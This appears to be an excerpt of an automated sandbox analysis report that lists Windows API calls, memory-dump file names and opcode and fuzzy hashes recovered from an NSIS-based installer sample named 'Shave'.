                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                • Opcode ID: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
                                                                                                                                • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                                                                • Opcode Fuzzy Hash: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
                                                                                                                                • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                                                                • GetMessagePos.USER32 ref: 00404BEC
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                                                                                • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                                                                • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                • wsprintfW.USER32 ref: 00406653
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                • Opcode ID: 550d24ea38cda2d92e74c1bb79bc0c47b539332056a7156cf0f117270c7474f2
                                                                                                                                • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                                                                • Opcode Fuzzy Hash: 550d24ea38cda2d92e74c1bb79bc0c47b539332056a7156cf0f117270c7474f2
                                                                                                                                • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: *?|<>/":
                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                                                                                • CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                                                                                • CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext
                                                                                                                                • String ID: :$\
                                                                                                                                • API String ID: 3213498283-1166558509
                                                                                                                                • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                                                                • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017B0
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017D5
                                                                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                  • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                                                                                  • Part of subcall function 004052FF: lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                                                                                  • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                                                                                  • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                  • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1941528284-0
                                                                                                                                • Opcode ID: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                                                                                • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                                                                • Opcode Fuzzy Hash: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                                                                                • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                                                                • Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                                                                                • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                                                                • Opcode Fuzzy Hash: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                                                                                • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                                                                • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                • wsprintfW.USER32 ref: 00404B65
                                                                                                                                • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                                                                                • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                                                                • Opcode Fuzzy Hash: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                                                                                • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                                                                APIs
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$Enum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 464197530-0
                                                                                                                                • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                                                                • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
                                                                                                                                • GetLastError.KERNEL32 ref: 00405825
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                                                                • GetLastError.KERNEL32 ref: 00405844
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3449924974-0
                                                                                                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                                                                • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                                                                                • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CCD
                                                                                                                                • GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CDD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
